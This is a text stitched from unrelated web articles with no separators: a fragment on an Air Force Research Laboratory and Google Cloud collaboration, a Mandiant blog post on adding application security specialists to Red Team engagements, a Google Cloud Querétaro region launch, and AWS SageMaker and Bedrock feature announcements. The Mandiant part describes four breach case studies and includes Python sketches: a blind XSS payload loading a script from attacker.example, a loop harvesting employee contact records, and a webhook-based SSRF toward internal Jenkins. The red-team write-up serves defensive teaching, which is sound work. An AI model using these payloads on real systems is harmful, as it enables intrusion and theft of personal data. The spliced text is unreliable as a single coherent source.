Cloud capabilities and AI/ML tools provide a flexible and adaptable environment that empowers our researchers to rapidly prototype and deploy innovative solutions. It’s like having a toolbox filled with powerful AI building blocks that can be combined to tackle our unique research challenges.
Dr. Dan Berrigan
Air Force Research Laboratory
The AFRL’s collaboration with Google Cloud exemplifies how AI and cloud services can be a driving force behind innovation, efficiency, and problem-solving across agencies. As the government continues to invest in AI research and development, collaborations like this will be crucial for unlocking the full potential of AI and cloud computing, ensuring that agencies across the federal landscape can leverage these transformative technologies to create a more efficient, effective, and secure future for all.
Learn more about how we’ve helped government agencies accelerate their mission and impact with AI.
Watch the Google Public Sector Summit On Demand to gain crucial insights on the critical intersection of AI and Security in the public sector.
Written by: Ilyass El Hadi, Louis Dion-Marcil, Charles Prevost
Executive Summary
Whether through a comprehensive Red Team engagement or a targeted external assessment, incorporating application security (AppSec) expertise enables organizations to better simulate the tactics and techniques of modern adversaries. This includes:
Leveraging minimal access for maximum impact: High-privilege escalation is not always necessary. Red Team objectives can often be achieved with limited access, highlighting the importance of securing all internet-facing assets.
Recognizing the potential of low-impact vulnerabilities through vulnerability chaining: Low- and medium-impact vulnerabilities can be exploited in combination to achieve significant impact.
Developing your own exploits: Skilled adversaries or consultants will invest the time and resources to reverse-engineer and/or find zero-day vulnerabilities in the absence of public proof-of-concept exploits.
Employing diverse skill sets: Red Team members should include individuals with a wide range of expertise, including AppSec.
Fostering collaboration: Combining diverse skill sets can spark creativity and lead to more effective attack simulations.
Integrating AppSec throughout the engagement: Offensive application security contributions can benefit Red Teams at every stage of the project.
By embracing this approach, organizations can proactively defend against a constantly evolving threat landscape, ensuring a more robust and resilient security posture.
Introduction
In today’s rapidly evolving threat landscape, organizations find themselves engaged in an ongoing arms race against increasingly sophisticated cyber criminals and nation-state actors. To stay ahead of these adversaries, many organizations turn to Red Team assessments, simulating real-world attacks to expose vulnerabilities before they are exploited. However, many traditional Red Team assessments typically prioritize attacking network and infrastructure components, often overlooking a critical aspect of modern attack surfaces: web applications.
This gap hasn’t gone unnoticed by cyber criminals. In recent years, industry reports consistently highlight the evolving trend of attackers exploiting public-facing application vulnerabilities as a primary entry point into organizations. This aligns with Mandiant’s observations of common tactics used by threat actors, as observed in our 2024 M-Trends Report: “In intrusions where the initial intrusion vector was identified, 38% of intrusions started with an exploit. This is a six percentage point increase from 2022.”
The 2024 M-Trends Report also documents that 28.7% of Initial Compromise access is obtained through exploiting public-facing web applications (MITRE T1190).
Figure 1: Initial Compromise statistics from the M-Trends report
At Mandiant, we recognize this gap and are committed to closing it by integrating AppSec expertise into our Red Team assessments. This optional approach is offered to customers who wish to increase the coverage of their external perimeters to gain a deeper understanding of their security posture. While most of the infrastructure typically receives a considerable amount of security scrutiny, web applications and edge devices often lack the same level of consideration, making them prime targets for attackers.
This integrated approach is not limited to full-scope Red Team engagements. Organizations with varying maturity levels can also leverage application security expertise within the context of focused external perimeter assessments. These assessments provide a valuable and cost-effective way to gain insights into the security of internet-facing applications and systems, without the need for a Red Team exercise.
The Role of Application Security in Red Team Assessments
The integration of AppSec specialists into Red Team assessments manifests in a unique staffing approach. The role of this specialist is to augment the Red Team’s capabilities with the ever-evolving exploitation techniques used by adversaries to breach organizations from the external perimeter.
The AppSec specialist will often get involved as early as possible on an engagement, even during the scoping and early planning stages. They perform a meticulous review of the target perimeter, mapping out the application inventory and identifying vulnerabilities within the various components of web applications and application programming interfaces (APIs) exposed to the internet.
While examination is underway, Red Team operators concurrently focus on other crucial aspects of the assessment, including infrastructure preparation, crafting convincing phishing campaigns, developing and refining tools, and creating effective payloads that will evade the target environment’s controls and defense mechanisms.
Once an AppSec vulnerability of critical impact is discovered, the team will generally proceed to its exploitation, notifying our primary point of contact of our preliminary findings and validating the potential impacts of our discovery. It is important to note that a successful finding doesn’t always result in a direct foothold in the target environment. The intelligence gathered through the extensive reconnaissance and perimeter review phase can be repurposed for various aspects of the Red Team mission. This could include:
Identifying valuable reconnaissance targets or technologies to fine-tune a social engineering campaign
Further tailoring an attack payload
Establishing a temporary foothold that might lead to further exploitation
Hosting malicious payloads for later stages of the attack simulation
Once the external perimeter examination phase is complete, our Red Team operators will begin carrying out the remaining mission objectives, empowered with the AppSec team’s insights and intelligence, including identified vulnerabilities and associated exploits. Even though the Red Team operators will perform most of the remaining activities at this point, the AppSec consultants will stay close to the engagement and often step in to further support internal exploitation efforts. For example, applications that are only accessible internally generally receive far less scrutiny and are consequently assessed much less frequently than externally accessible assets.
By incorporating AppSec expertise, we’ve seen a significant increase in engagements where our Red Team gained a decisive advantage during a customer’s external perimeter review, such as obtaining a foothold or gaining access to confidential information. This overall approach translates to a more realistic and valuable assessment for our customers, ensuring comprehensive coverage of both network and application security risks. By uncovering and addressing vulnerabilities across the entire attack surface, Mandiant empowers organizations to proactively defend against a wide array of threats, strengthening their overall security posture.
Case Studies: Demonstrating the Impact of Application Security Support
In this section, we focus on four of the multiple real-world scenarios where the support of Mandiant’s AppSec Team has significantly enhanced the effectiveness of Red Team assessments. Each case study highlights the attack vectors, the narrative behind the attack, key takeaways from the experience, and the associated assumptions and misconceptions.
These case studies highlight the value of incorporating application security support in Red Team engagements, while also offering valuable learning opportunities that promote collaboration and knowledge sharing.
Unlocking the Vault: Exposed API Key to Sensitive Internal Document Access
Context
A company in the energy sector engaged Mandiant to assess the efficiency of its cybersecurity team’s abilities in detection, prevention, and response. Because the organization had grown significantly in the past years following multiple acquisitions, Mandiant suggested an increased focus on their external perimeter. This would allow the organization to measure the subsidiaries’ external security posture, compared to the parent organization’s.
Target of Interest
Following a thorough reconnaissance phase, the AppSec Team began examination of a mobile application developed by the customer for its business partners. Once the mobile application was decompiled, a hardcoded API key granting unauthorized access to an external API service was discovered. Leveraging the API key, authenticated reconnaissance on the API service was conducted, which led to the discovery of a significant vulnerability within the application’s PDF generation feature: a full-read Server-Side Request Forgery (SSRF), enabled through HTML injection.
Vulnerability Identification
During the initial reconnaissance phase, the team observed that numerous internal systems’ hostnames were publicly accessible through certificate transparency logs. With that in mind, the objective was to exploit the SSRF vulnerability to determine if any of these internal systems were reachable via the external API service. Eventually, one such host was identified: a commercial ASP.NET document management solution. Once the solution’s name and version were identified, the AppSec Team searched for known vulnerabilities online. Among the findings was a recent CVE entry regarding insecure ViewState deserialization, which included details about the affected dynamic-link library (DLL) name.
Exploitation
With no public exploit proof-of-concepts available, the team searched for the DLL without success until the file was found in VirusTotal’s public corpus. The DLL was then decompiled into C# code, revealing the vulnerable function, which provided all the necessary components for a successful exploitation. Next, the application security consultants leveraged the post-authentication SSRF vector to exploit the ViewState deserialization vulnerability, affecting the internal application. This attack chain led to a reliable foothold into the parent organization’s internal network.
Figure 2: HTML to PDF Server-Side Request Forgery to deserialization
Takeaways
The organization’s demilitarized zone (DMZ) was now breached, and the remote access could be passed off to the Red Team operators. This enabled the operators to perform lateral movement into the network and achieve various predetermined objectives. However, the customer expressed high satisfaction with the demonstrated impact prior to lateral movement, especially since the application server housed numerous sensitive documents. This underscores a common misconception that exploiting the external perimeter must necessarily result in facilitating lateral movement within the internal network. Yet, the impact was evident even before lateral movement, simply by gaining access to the customer’s sensitive data.
Breaking Barriers: Blind XSS as a Gateway to Internal Networks
Context
A company operating in the technology industry engaged Mandiant for a Red Team assessment. This company, with a very mature security program, requested that no phishing be performed because they were already conducting numerous internal phishing and vishing exercises. They highlighted that all previous Red Team engagements had relied heavily on various social engineering methods, and the success rate was consistently low.
Target of Interest
During the external reconnaissance efforts, the AppSec Team identified multiple targets of interest, such as a custom-built customer relationship management (CRM) solution. Leveraging the Wayback Machine on the CRM hostname, a legacy endpoint was discovered, which appeared obsolete but still accessible without authentication.
Vulnerability Identification
Despite not being accessible through the CRM’s user interface, the endpoint contained a functional form to request support. The AppSec Team injected a blind cross-site scripting (XSS) payload into the form, which loaded an external JavaScript file containing post-exploitation code. When successful, this method allows an adversary to temporarily hijack the targeted user’s browser tab, allowing attackers to perform actions on behalf of the user. Moments later, the team received a notification that the payload successfully executed within the context of a user browsing an internal customer support administration panel.
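For readers unfamiliar with the technique, a blind XSS submission looks roughly like the sketch below: the payload is stored by the vulnerable form and only fires later, when a back-office user views the submission. The endpoint, form fields, and hook URL are all hypothetical, and this is a simplified illustration rather than the actual payload used on the engagement.

```python
import requests

# Hypothetical attacker-hosted script; in a real engagement this would
# be post-exploitation JavaScript that reports back execution context.
HOOK = "https://attacker.example/hook.js"

# Break out of an HTML attribute context, then load the hook script.
payload = f'"><script src="{HOOK}"></script>'

# Hypothetical legacy support form; the HTTP response reveals nothing,
# hence "blind": success is only observed when the payload phones home.
requests.post(
    "https://crm.example.com/legacy/support/request",
    data={"subject": "Support request", "message": payload},
    timeout=10,
)
```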
The AppSec Team analyzed the exfiltrated Document Object Model (DOM) to further understand the payload’s execution context and assess the data accessible within this internal application. The analysis revealed references to Apache Tapestry framework version 3, a framework initially released in 2004. Shortly after identifying the internal application’s framework, Mandiant deployed a local Tapestry v3 instance to identify potential security pitfalls. Through code review, Mandiant discovered a zero-day deserialization vulnerability in the core framework, which led to remote code execution (RCE). Apache Software Foundation assigned CVE-2022-46366 for this RCE.
Exploitation
The zero-day, which affected the internal customer support application, was exploited by submitting an additional blind XSS payload. Crafted to trigger upon form submission, the payload autonomously executed in an employee’s browser, exploiting the internal application’s deserialization flaw. This led to a crucial foothold within the client’s infrastructure, enabling the Red Team to progress with their lateral movement until all objectives were successfully accomplished.
Figure 3: Remote code execution staged with blind cross-site scripting
Takeaways
This real-world scenario highlights a common misconception that cross-site scripting holds minimal relevance in Red Team assessments. The significance and impact of this particular attack vector in this case study were evident: it acted as a gateway, breaching the external network and leveraging an employee’s internal network position as a proxy to exploit the internal application. Mandiant had not previously identified XSS vulnerabilities on the external perimeter, which further highlights how the security posture of the external perimeter can be much more robust than that of the internal network.
Logger Danger: From Log Files to Unauthorized Cloud Access
Context
An organization in the transportation sector engaged Mandiant to perform a Red Team assessment, with the goal of emulating an initial access broker (IAB) threat group, focused on breaching externally exposed systems and services. Those groups, who typically resell illegitimate access to compromised victims’ environments, were previously identified as a significant threat to the organization by the Google Threat Intelligence (GTI) team while building a threat profile to help support assessment activities.
Target of Interest
Among hundreds of external applications identified during the reconnaissance phase, one stood out: a commercial Java-based supply chain management solution hosted in the cloud. This application attracted additional attention upon the discovery of an online forum post describing its installation procedures. Within the post, a link to an unlisted YouTube video was shared, offering detailed installation and administration guidance. Upon reviewing the video, the AppSec Team noted the URL for the application’s trial installer, still accessible online despite not being referenced or indexed anywhere else.
Following installation and local deployment, an administration manual was available within the installation folder. This manual contained a section for a web-based performance monitor plugin that was deployed by default with the application, along with its default credentials. The plugin’s functionality included logging performance metrics and stack traces locally in files upon encountering unhandled errors. Furthermore, the plugin’s endpoint name was distinctive, making it highly unlikely to be discovered with conventional directory brute-forcing methods.
Vulnerability Identification
The AppSec Team successfully logged into the organization’s performance monitor plugin by using the default credentials sourced from the administration manual and resumed local testing to identify post-authentication vulnerabilities. Conducting code review in parallel with manual testing, a log management feature was identified, which allowed authenticated users to manipulate log filenames and directories. The team also observed they could induce errors through targeted, malformed HTTP requests. In conjunction with the log filename manipulation, it was possible to force arbitrary data to be stored at an arbitrary file location on the underlying server’s file system.
Exploitation
The strategy involved intentionally triggering exceptions, which the performance monitor would then log in an attacker-defined Jakarta Server Pages (JSP) file within the web application’s root directory. The AppSec Team crafted an exploit that injected arbitrary JSP code into an HTTP request’s parameter, forcing the performance monitor to log errors into the attacker-controlled JSP file. Upon accessing the JSP log file, the injected code executed, enabling Mandiant to breach the customer’s cloud environment and access thousands of sensitive logistics documents.
Figure 4: Remote code execution through log file poisoning
Takeaways
A common assumption that breaches should lead to internal on-premises network access or to Active Directory compromise was challenged in this case study. While lateral movement was constrained by time, the primary objective was achieved: emulating an initial access broker. This involved breaching the cloud environment, where the client lacked visibility compared to its internal Active Directory network, and gaining access to business-critical crown jewels.
Collaborative Intrusion: Webhooks to CI/CD Pipeline Access
Context
A company in the automotive sector engaged Mandiant to perform a Red Team assessment, with the goal of obtaining access to their continuous integration and continuous delivery/deployment (CI/CD) pipeline. Due to the sheer number of externally exposed systems, the AppSec Team was staffed to support the Red Team’s reconnaissance and breaching efforts.
Target of Interest
Most of the interesting applications redirected to the customer’s single sign-on (SSO) provider. One application, however, behaved differently. By querying the Wayback Machine, the team uncovered an endpoint that did not redirect to the SSO. Instead, it presented a blank page with a unique favicon. To identify the application’s underlying technology, the team calculated the favicon’s hash and queried it on Shodan. The results returned many other live applications sharing the same favicon. Interestingly, some of these applications operated independently of SSO, helping the team identify the application’s name and vendor.
Vulnerability Identification
Once the application’s name was identified, the team visited the vendor’s website and accessed its public API documentation. Among the API endpoints, one stood out: it could be accessed directly on the customer’s application without redirection to the SSO. This endpoint required no authentication and took only an incremental numeric ID as its parameter’s value. Upon querying, the response contained sensitive employee information, including email addresses and phone numbers. The team systematically iterated through the endpoint, incrementing the ID parameter to compile a comprehensive list of employee email addresses and phone numbers, as sketched below. However, the Red Team refrained from leveraging this data, as another intriguing application was discovered: it exposed a feature that could be manipulated into sending fully user-controlled emails from the company’s no-reply@ email address.
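The enumeration itself amounts to a simple loop over the incremental identifier. The endpoint and field names in this sketch are hypothetical:

```python
import requests

# Hypothetical unauthenticated endpoint taking an incremental numeric ID.
API = "https://app.example.com/api/v1/employees/{}"

directory = []
for emp_id in range(1, 10000):
    resp = requests.get(API.format(emp_id), timeout=5)
    if resp.status_code == 200:
        record = resp.json()
        # Field names are illustrative; the real schema differed.
        directory.append((record.get("email"), record.get("phone")))

print(f"Collected {len(directory)} employee records")
```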
Capitalizing on these vulnerabilities, the Red Team initiated a phishing campaign, successfully gaining a foothold in the customer’s network before the AppSec Team could identify an external breach vector. As internal post-exploitation continued, the application security consultants shifted their focus to supporting the Red Team’s efforts within the internal network.
Exploitation
Digging into network shares, the Red Team found credentials for a developer’s account on an enterprise source control application. The AppSec Team sifted through reconnaissance data and flagged that the same source control server was exposed externally. The credentials were successfully used to log in, as multi-factor authentication was absent for this user. Within the GitHub interface, the team uncovered a pre-defined webhook linked to the company’s internal Jenkins, an integration commonly employed to facilitate communication between source control systems and CI/CD pipelines. Leveraging this discovery, the team created a new webhook that, when manually triggered, would perform server-side request forgery (SSRF) against internal URLs. This eventually led to the exploitation of an unauthenticated Jenkins sandbox bypass vulnerability (CVE-2019-1003030) and, ultimately, remote code execution, effectively compromising the organization’s CI/CD pipeline.
Figure 5: External perimeter breach via CI/CD SSRF
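Conceptually, the webhook-based SSRF can be sketched with GitHub’s standard webhooks REST API. The API base URL, repository, token, and internal Jenkins address below are all placeholders:

```python
import requests

# The API base, repository, token, and internal Jenkins URL are placeholders.
GHE_API = "https://github.example-corp.com/api/v3"
HEADERS = {"Authorization": "token <compromised-developer-token>"}

# Webhook deliveries are sent by the source control server itself, so a
# webhook pointed at an internal-only URL coerces the server into issuing
# requests on the attacker's behalf (SSRF).
hook = requests.post(
    f"{GHE_API}/repos/acme/app/hooks",
    headers=HEADERS,
    json={
        "name": "web",
        "active": True,
        "events": ["push"],
        "config": {"url": "http://jenkins.internal:8080/", "content_type": "json"},
    },
).json()

# Manually trigger a delivery to fire the server-side request on demand.
requests.post(f"{GHE_API}/repos/acme/app/hooks/{hook['id']}/tests", headers=HEADERS)
```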
Takeaways
This case study demonstrated the efficacy of collaboration between the Red Team and the AppSec Team. Leveraging insights gathered collectively, the teams devised a strategic plan to achieve the main objective set by the customer: accessing its CI/CD pipelines. Moreover, it challenged the misconception that a single critical vulnerability is indispensable for reaching objectives. In reality, achieving goals often requires innovative detours: a combination of vulnerabilities or misconfigurations, whether discovered by the AppSec Team or the Red Team, can be strategically chained together to accomplish the mission.
Conclusion
As this blog post demonstrated, the integration of application security expertise into Red Team assessments yields significant benefits for organizations seeking to understand and strengthen their security posture. By proactively identifying and addressing vulnerabilities across the entire attack surface, including those commonly overlooked by traditional approaches, businesses can minimize the risk of breaches, protect critical assets, and hopefully avoid the financial and reputational damage associated with successful attacks.
This integrated approach is not limited to Red Team engagements. Organizations with varying maturity levels can also leverage application security expertise within the context of focused external perimeter assessments. These assessments provide a valuable and cost-effective way to gain insights into the security of internet-facing applications and systems, without the need for a Red Team exercise.
Whether through a comprehensive Red Team engagement or a targeted external assessment, incorporating application security expertise enables organizations to better simulate the tactics and techniques of modern adversaries.
Google Cloud is delighted to announce the opening of our 41st cloud region in Querétaro, Mexico. This marks our third cloud region in Latin America, joining Santiago, Chile, and São Paulo, Brazil. From Querétaro, we’ll provide fast, reliable cloud services to businesses and public sector organizations throughout Mexico and beyond. This new region offers low latency, high performance, and local data residency, empowering organizations to innovate and accelerate digital transformation initiatives.
Helping organizations in Mexico thrive in the cloud
Google Cloud regions are major investments to bring best-in-class infrastructure, cloud and AI technologies closer to customers. Enterprises, startups, and public sector organizations can leverage Google Cloud’s infrastructure economy of scale and global network to deliver applications and digital services to their end users.
With this new region in Querétaro, Mexico, Google Cloud customers enjoy:
Speed: Serve your end users with fast, low-latency experiences, and transfer large amounts of data between networks easily across Google’s global network.
Security: Keep your organizations’ and customers’ data secure and compliant, including meeting the requirements of CNBV contractual frameworks, and maintain local data residency.
Capacity: Scale to meet growing user and business needs.
Sustainability: Reduce the carbon footprint of your IT environment and help meet sustainability targets.
Google Cloud customers are eager to benefit from the new possibilities that this cloud region offers:
“At Prosa, we have been undergoing a transformation process for the past three years that involves adopting technology and developing digital skills within our teams. The partnership with Google has been key to carrying out projects, evolving towards digital business models, enabling the ecosystem, promoting the API-ification of services, and improving data analysis. This alliance is only deepened with the launch of the new Google Cloud region, which will facilitate the integration of participants into the payment ecosystem in a secure and highly available manner, improving the customer experience and delivering value more quickly and agilely,” said Salvador Espinosa, CEO of Prosa, a payment technology company that processed more than 10 million transactions in 2023.
The new Google Cloud region in Querétaro is also welcomed by the Mexican public sector.
“The new Google cloud region in Mexico will be key to build a digital government accountable to citizens, deepening our path to digital transformation. Since 2018, the Auditoria Superior de la Federación (ASF) has pioneered digital transformation in Mexico, promoting innovation and the responsible use of technology, while using advanced technologies like Google Cloud’s Vertex AI, among other proprietary tools, to enhance data analysis, automate processes, and improve collaboration. This enables more accurate decision-making, optimized oversight of public spending, increased inspection coverage, and transparent use of resources. Thanks to the cloud, we see a future where technology is a strategic ally to execute efficient, agile and exhaustive digital audits, detect irregularities early, and strengthen accountability. ASF’s focus on transparency and efficiency aligns with President Claudia Sheinbaum’s public innovation policy.” – Emilio Barriga Delgado, Special Auditor of Federalized Expenditure, Auditoria Superior de la Federación
The new cloud region also opens new opportunities for our global ecosystem of over 100,000 incredibly diverse partners.
“For Amarello and our customers, the availability of a new region in Mexico demonstrates the great growth of Google Cloud and its commitment to Mexico. It’s also a great milestone for the country, putting us on par with other economies. This will create jobs that will speed up our clients’ adoption of strategic projects and latency-sensitive technological services such as financial services or mission-critical operations. At the same time, the new region will enable projects that require information to be maintained within the national territory, now on the most innovative and secure public cloud.” – Mauricio Sánchez Valderrama, managing partner, Amarello Tecnologías de Información
And for global companies looking to tap into the Mexican market:
“As networks shift to a cloud-first approach, and hybrid work enables work from anywhere, businesses in the Mexico region can now securely accelerate innovation, boost efficiency, and enhance customer experiences with Palo Alto Networks AI-powered solutions, like Prisma SASE, built in the cloud to secure the cloud at scale. The powerful collaboration between Google Cloud and Palo Alto Networks reinforces our commitment to security and innovation so organizations can confidently embrace the AI-driven future, knowing their users, data, and applications are protected from evolving threats.” – Anupam Upadhyaya, Vice President, Product Management, Palo Alto Networks
Delivering on our commitment to Latin America
In 2022, we announced a five-year, $1.2 billion commitment to Latin America, focusing on four key areas: digital infrastructure, digital skills, entrepreneurship, and inclusive, sustainable communities.
We’re equally committed to creating new career opportunities for people in Mexico and Latin America: We’re working with over 550 universities across Latin America to offer a robust and continuously updated portfolio of learning resources so students can seize the opportunities created by new digital technologies like AI and the cloud. As a result, we’ve already granted more than 14,000 digital skill badges to students and individual developers in Mexico over the last 24 months.
Another example of our commitment is the “Súbete a la nube” program that we created in partnership with the Inter-American Development Bank (IDB), with a focus on women and the southern region of the country. To date, 12,500 people have registered for essential digital skills training in cloud computing through the program.
Today, we’re also announcing a commitment to train 1 million Mexicans in AI and cloud technologies over the coming years. Google Cloud will continue to skill Mexico’s local talent with a variety of no-cost training programs for students, developers and customers. Some of the ongoing training programs will include no-cost, localized courses available through YouTube, credentials through the Google Cloud Skills Boost platform, community support by Google Developer Groups, and scholarships for the Google Career Certificates that help prepare learners for high-growth, in-demand jobs in fields like cybersecurity and data analytics, so the cloud can truly democratize innovation and technology.
This new Google Cloud region is also a step towards providing generative AI products and services to Latin American customers. Cloud computing will increasingly be a key gateway towards the development and usage of AI, helping organizations compete and innovate at global scale.
Google Cloud is dedicated to being the partner of choice for customers undergoing digital transformation. We’re focused on providing sustainable, low-carbon options for running applications and infrastructure. Since 2017, we’ve matched 100% of our global annual electricity use with renewable energy. We’re aiming even higher with our 2030 goal: operating on 24/7 carbon-free energy across every electricity grid where we operate, including Mexico.
We’re incredibly excited to open the Querétaro, Mexico region, bringing low-latency, reliable cloud services to Mexico and Latin America, so organizations can take advantage of all that the cloud has to offer. Stay tuned for even more Google Cloud regions coming in 2025 (and beyond), and click here to learn more about Google Cloud’s global infrastructure.
Today Amazon Web Services, Inc. (AWS) announced the general availability of Amazon SageMaker partner AI apps, a new capability that enables customers to easily discover, deploy, and use best-in-class machine learning (ML) and generative AI (GenAI) development applications from leading app providers, privately and securely, all without leaving Amazon SageMaker AI, so they can develop performant AI models faster.
Until today, integrating purpose-built GenAI and ML development applications that provide specialized capabilities for a variety of model development tasks required considerable effort. Beyond investing time in due diligence to evaluate existing offerings, customers had to perform undifferentiated heavy lifting to deploy, manage, upgrade, and scale these applications. Furthermore, to adhere to rigorous security and compliance protocols, organizations need their data to stay within their security boundaries, without moving it elsewhere, for example to a software-as-a-service (SaaS) application. Finally, the resulting developer experience is often fragmented, with developers switching back and forth between multiple disjointed interfaces. With SageMaker partner AI apps, you can quickly subscribe to a partner solution and seamlessly integrate the app with your SageMaker development environment. SageMaker partner AI apps are fully managed and run privately and securely in your SageMaker environment, reducing the risk of data and model exfiltration.
At launch, you will be able to boost your team’s productivity and reduce time to market by enabling: Comet, to track, visualize, and manage experiments for AI model development; Deepchecks, to evaluate quality and compliance for AI models; Fiddler, to validate, monitor, analyze, and improve AI models in production; and Lakera, to protect AI applications from security threats such as prompt attacks, data loss, and inappropriate content.
SageMaker partner AI apps are available in all currently supported regions except AWS GovCloud (US). To learn more, please visit the SageMaker partner AI apps developer guide.
Amazon SageMaker HyperPod now provides centralized governance across all generative AI development tasks, such as training and inference. You have full visibility and control over compute resource allocation, ensuring the most critical tasks are prioritized, maximizing compute resource utilization, and reducing model development costs by up to 40%.
With HyperPod task governance, administrators can easily define priorities for different tasks and set limits on how many compute resources each team can use. At any given time, administrators can also monitor and audit running or waiting tasks through a visual dashboard. When data scientists create tasks, HyperPod automatically runs them, adhering to the defined compute resource limits and priorities. For example, when training for a high-priority model needs to be completed as soon as possible but all compute resources are in use, HyperPod frees up resources from lower-priority tasks: it pauses the low-priority task, saves the checkpoint, and reallocates the freed-up compute resources. The preempted low-priority task resumes from the last saved checkpoint as resources become available again. And when a team is not fully using its resource limits, HyperPod can use those idle resources to accelerate another team’s tasks. Additionally, HyperPod is now integrated with Amazon SageMaker Studio, bringing task governance and other HyperPod capabilities into the Studio environment. Data scientists can now seamlessly interact with HyperPod clusters directly from Studio, allowing them to develop, submit, and monitor machine learning (ML) jobs on powerful accelerator-backed clusters.
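The scheduling behavior can be pictured with a toy model. The sketch below is purely conceptual, illustrating the preempt, checkpoint, and resume logic in plain Python; it does not use any HyperPod or AWS API:

```python
import heapq

class Task:
    def __init__(self, name, priority):
        self.name, self.priority = name, priority
        self.checkpoint = None

running, waiting = [], []  # waiting acts as a max-priority queue

def submit(task, free_gpus):
    """Admit a task, preempting lower-priority work when capacity is full."""
    if free_gpus > 0:
        running.append(task)
        return free_gpus - 1
    victim = min(running, key=lambda t: t.priority)
    if victim.priority < task.priority:
        # Pause the low-priority task: save a checkpoint, free its resources.
        victim.checkpoint = f"s3://ckpts/{victim.name}"
        running.remove(victim)
        heapq.heappush(waiting, (-victim.priority, victim.name, victim))
        running.append(task)
    else:
        heapq.heappush(waiting, (-task.priority, task.name, task))
    return free_gpus

free = submit(Task("exploratory-finetune", priority=1), free_gpus=1)
free = submit(Task("prod-launch-training", priority=9), free)

# The low-priority task was checkpointed and queued; it will resume from its
# last checkpoint when capacity frees up, mirroring HyperPod's behavior.
print([t.name for t in running])                  # ['prod-launch-training']
print([item[2].checkpoint for item in waiting])   # ['s3://ckpts/exploratory-finetune']
```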
Task governance for HyperPod is available in all AWS Regions where HyperPod is available: US East (N. Virginia), US West (N. California), US West (Oregon), Asia Pacific (Mumbai), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo), Europe (Frankfurt), Europe (Ireland), Europe (London), Europe (Stockholm), and South America (São Paulo).
Amazon SageMaker HyperPod now offers flexible training plans, a new capability that allows you to train generative AI models within your timelines and budgets. Gain predictable model training timelines and run training workloads within your budget requirements, while continuing to benefit from SageMaker HyperPod features such as resiliency, performance-optimized distributed training, and enhanced observability and monitoring.
In a few quick steps, you can specify your preferred compute instances, desired amount of compute resources, duration of your workload, and preferred start date for your generative AI model training. SageMaker then helps you create the most cost-efficient training plans, reducing time to train your model by weeks. Once you create and purchase your training plans, SageMaker automatically provisions the infrastructure and runs the training workloads on these compute resources without requiring any manual intervention. SageMaker also automatically takes care of pausing and resuming training between gaps in compute availability, as the plan switches from one capacity block to another. If you wish to remove all the heavy lifting of infrastructure management, you can also create and run training plans using SageMaker fully managed training jobs.
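Programmatically, creating a plan might look like the following boto3 sketch, assuming the SearchTrainingPlanOfferings and CreateTrainingPlan APIs; the instance values are illustrative and exact parameter shapes may differ:

```python
import boto3

sm = boto3.client("sagemaker")

# Find plan offerings matching the desired capacity and time window
# (instance type, count, duration, and target are illustrative values).
offerings = sm.search_training_plan_offerings(
    InstanceType="ml.p5.48xlarge",
    InstanceCount=8,
    DurationHours=72,
    TargetResources=["hyperpod-cluster"],
)

# Purchase the top-ranked (most cost-efficient) offering as a training plan;
# SageMaker then provisions the reserved capacity blocks automatically.
sm.create_training_plan(
    TrainingPlanName="llm-pretraining-plan",
    TrainingPlanOfferingId=offerings["TrainingPlanOfferings"][0]["TrainingPlanOfferingId"],
)
```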
SageMaker HyperPod flexible training plans are available in the US East (N. Virginia), US East (Ohio), and US West (Oregon) AWS Regions. To learn more, visit: SageMaker HyperPod, documentation, and the announcement blog.
Amazon Bedrock Knowledge Bases now supports natural language querying to retrieve structured data from your data sources. With this launch, Bedrock Knowledge Bases offers an end-to-end managed workflow for customers to build custom generative AI applications that can access and incorporate contextual information from a variety of structured and unstructured data sources. Using advanced natural language processing, Bedrock Knowledge Bases can transform natural language queries into SQL queries, allowing users to retrieve data directly from the source without the need to move or preprocess the data.
Developers often face challenges integrating structured data into generative AI applications. These include the difficulty of training large language models (LLMs) to convert natural language queries to SQL queries based on complex database schemas, as well as ensuring appropriate data governance and security controls are in place. Bedrock Knowledge Bases eliminates these hurdles by providing a managed natural-language-to-SQL (NL2SQL) module. A retail analyst can now simply ask “What were my top 5 selling products last month?”, and Bedrock Knowledge Bases automatically translates that query into SQL, executes it against the database, and returns the results, or even provides a summarized narrative response. To generate accurate SQL queries, Bedrock Knowledge Bases leverages the database schema, previous query history, and other contextual information provided about the data sources.
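A minimal boto3 sketch of such a query, assuming a knowledge base already connected to a structured store such as Amazon Redshift (the knowledge base ID and model ARN are placeholders):

```python
import boto3

agent_runtime = boto3.client("bedrock-agent-runtime")

# Ask a natural-language question against a knowledge base connected to a
# structured data source; the ID and model ARN below are placeholders.
response = agent_runtime.retrieve_and_generate(
    input={"text": "What were my top 5 selling products last month?"},
    retrieveAndGenerateConfiguration={
        "type": "KNOWLEDGE_BASE",
        "knowledgeBaseConfiguration": {
            "knowledgeBaseId": "KB123EXAMPLE",
            "modelArn": "arn:aws:bedrock:us-east-1::foundation-model/anthropic.claude-3-5-sonnet-20241022-v2:0",
        },
    },
)

# The NL2SQL module generates and runs the SQL; the model summarizes the result.
print(response["output"]["text"])
```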
Bedrock Knowledge Bases supports structured data retrieval from Amazon Redshift and Amazon SageMaker Lakehouse at this time, and is available in all commercial regions where Bedrock Knowledge Bases is supported. To learn more, visit here and here. For details on pricing, please refer here.
Amazon Bedrock Marketplace provides generative AI developers access to over 100 publicly available and proprietary foundation models (FMs), in addition to Amazon Bedrock’s industry-leading, serverless models. Customers deploy these models onto SageMaker endpoints where they can select their desired number of instances and instance types. Amazon Bedrock Marketplace models can be accessed through Bedrock’s unified APIs, and models which are compatible with Bedrock’s Converse APIs can be used with Amazon Bedrock’s tools such as Agents, Knowledge Bases, and Guardrails.
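As a sketch of the unified-API idea, a Converse-compatible Marketplace deployment could plausibly be invoked like any other Bedrock model, with the SageMaker endpoint ARN passed as the model identifier; the ARN is a placeholder, and this pattern is an assumption based on the description above:

```python
import boto3

bedrock_runtime = boto3.client("bedrock-runtime")

# The endpoint ARN below is a placeholder for a Marketplace model deployed
# to a SageMaker endpoint; passing it as modelId is the assumed pattern here.
response = bedrock_runtime.converse(
    modelId="arn:aws:sagemaker:us-east-1:111122223333:endpoint/my-marketplace-model",
    messages=[{
        "role": "user",
        "content": [{"text": "Summarize our Q3 logistics report in three bullets."}],
    }],
)
print(response["output"]["message"]["content"][0]["text"])
```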
